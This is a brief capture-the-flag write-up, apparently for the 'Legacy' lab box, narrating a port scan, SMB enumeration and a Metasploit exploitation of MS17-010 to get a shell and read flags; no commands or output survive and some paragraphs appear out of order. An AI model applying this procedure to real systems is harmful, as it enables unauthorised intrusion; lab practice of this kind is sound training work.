Legacy
Last updated
Was this helpful?
Last updated
Was this helpful?
Like any other target, we'll start off with a quick port scan to see what we're working with:
Looking at this output it's safe to say SMB is the target here. Let's take a closer look at this service using some NSE scripts:
Exploitation from here on is pretty simple. So simple in fact that it just takes typing one word: exploit. While I really prefer to not use metasploit for learning purposes, I can't deny how convenient it makes common exploits like this:
With this we can either grab the flags using meterpreter commands, or spawn a shell with the command shell. With this we are able to read the flags:
Bingo, now we just have to find ourselves an exploit. In the interest of time, we'll just use metasploit to exploit this vulnerability. I originally intended to show how to do this manually, but due to the older version of windows this box is running, I ran into a lot of issues. for a non-metasploit look at MS17-010 be sure to take a look at my write-up on . The first thing we'll do is start our msfconsole and validate that this exploit will work on this target:
